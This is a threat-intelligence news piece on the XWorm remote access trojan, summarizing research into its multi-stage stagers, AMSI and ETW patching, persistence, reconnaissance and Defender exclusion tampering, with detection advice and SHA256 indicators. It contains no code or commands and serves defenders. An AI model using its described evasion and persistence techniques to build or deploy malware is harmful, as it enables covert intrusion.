.webp?w=696&resize=696,0&ssl=1 "XWorm Evolving Threat")
In the ever-shifting landscape of cybercrime, XWorm, a notorious remote access trojan (RAT), continues to evolve, arming threat actors with fresh tactics to bypass modern security defenses.
The Splunk Threat Research Team (STRT) has recently dissected a wave of new XWorm campaigns, revealing a sophisticated arsenal of stagers, loaders, and obfuscation techniques designed to infiltrate organizations undetected.
Sophisticated Multi-Stage Delivery Chain
Unlike many traditional malware strains that adhere to predictable infection paths, XWorm employs a diverse array of stagers and loaders, cycling through various file formats and scripting languages.
Recent attacks have leveraged a wide range of tools, including PowerShell scripts, VBS files, .NET executables, JavaScript, batch files, ISO images, VHD, IMG, and even malicious Office macros.
STRT’s analysis of 1,000 XWorm samples from Malware Bazaar highlighted the prevalence of phishing lures, with filenames themed around invoices, receipts, and shipping notifications, classic bait targeting business users.
Once clicked, these files unleash obfuscated code designed to avoid detection and analysis.
Key technical innovation lies in XWorm’s use of .hta and PowerShell stagers that download additional payloads directly from attacker-controlled command-and-control (C2) servers.
Many script-based stagers are heavily obfuscated, leveraging Base64 and AES encryption to conceal their actions and deliver follow-on malware components.
Defense Evasion and Persistence Mechanisms
Among XWorm’s most alarming features are its advanced evasion methods for defense.
The malware actively disables Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW), patching memory functions to bypass in-memory security scans and suppress system logs.
This allows malicious code to operate covertly, eluding both antivirus solutions and behavioral monitoring tools.
Persistence is achieved through registry run keys, scheduled tasks, and startup folder shortcuts, ensuring XWorm survives system reboots.
The analysis also reveals the RAT’s ability to replicate itself via removable drives and establish footholds for privilege escalation through scheduled tasks.
Once resident, XWorm conducts reconnaissance by querying Windows Management Instrumentation (WMI) to inventory security software, capture hardware details, and identify potential targets, such as webcams.
The RAT additionally modifies Microsoft Defender’s exclusion settings and executes PowerShell with bypassed policy settings, further evading security scrutiny.
Detection and Mitigation
To counter XWorm’s adaptations, Splunk provides a suite of analytic detections ranging from identifying suspicious child processes spawned by scripting engines to monitoring PowerShell operations indicative of cryptographic abuse or in-memory .NET assembly loading.
Given XWorm’s modularity, frequent updates, and deliberate targeting of the supply chain and gaming sectors, organizations are advised to enhance endpoint visibility, fine-tune detections for script-based stagers, and continuously educate employees about phishing threats.
IOC
| SHA256 | description |
|---|---|
| 78b15b9b54925120b713a52a09c66674463bd689e3b01395801ef58c77651127 | Bat loader |
| 0f10d6cbaf195a7b0c9f708b7f0a225e2de29beb769bdf8d1652b682b1c4679f | Powershell script |
| 28859e4387fefb9d1f36fdf711d1b058df5effe21d726cfe6a9a285f96db1c98 | Batch script |
| 327a98bd948262a10e37e7d0692c95e30ba41ace15fe01d8e614a9813ad9d5cf | Vb script |
| 354d082858bfc5e24133854ff14bb2e89bc16e1b010b9d3372c8370d3144cdb9 | hta |
.webp?resize=1600,900&ssl=1&description=XWorm Evolving Threat - In the ever-shifting landscape of cybercrime, XWorm, a notorious remote access trojan (RAT), continues to evolve.){kind=link}